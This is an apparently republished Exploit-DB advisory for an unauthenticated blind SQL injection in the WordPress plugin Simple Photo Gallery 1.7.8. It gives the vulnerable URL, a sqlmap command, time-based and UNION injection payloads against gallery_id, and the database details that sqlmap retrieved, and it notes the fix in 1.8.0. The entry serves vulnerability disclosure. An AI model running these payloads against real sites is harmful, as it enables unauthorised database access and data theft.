WordPress Plugin Simple Photo Gallery 1.7.8 – Blind SQL Injection

• Exploit Database
• 128 阅读

• 作者： woodspeed
  日期： 2015-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37113/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  # Exploit Title: Wordpess Simple Photo Gallery Blind SQL Injection # Date: 12-05-2015 # Exploit Author: woodspeed # Vendor Homepage: https://wordpress.org/plugins/simple-photo-gallery/ # Version: 1.7.8 # Tested on: Apache 2.2.22, PHP 5.3.10 # OSVDB ID : http://www.osvdb.org/show/osvdb/122374 # WPVULNDB ID : https://wpvulndb.com/vulnerabilities/8000 # Category: webapps   1. Description   Unauthenticated Blind SQL Injection via gallery_id field.   2. Proof of Concept   http://localhost/wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id=1&image_id=14     ./sqlmap.py --dbms=MYSQL --technique T -u http://localhost/wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id=1&image_id=14   sqlmap identified the following injection points with a total of 60 HTTP(s) requests: ---   Parameter: gallery_id (GET)   Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: gallery_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QBzh)     Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: gallery_id=1 UNION ALL SELECT CONCAT(0x7176787071,0x76576b586376794b756d,0x71707a7171)-- ---   web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)   web application technology: Apache 2.2.22, PHP 5.3.10   back-end DBMS operating system: Linux Ubuntu   back-end DBMS: MySQL 5.0.12   banner:'5.5.43-0ubuntu0.12.04.1'   current user:'wordpress@localhost'   current database:'wordpress'   ---   3. Solution   Fixed in version 1.8.0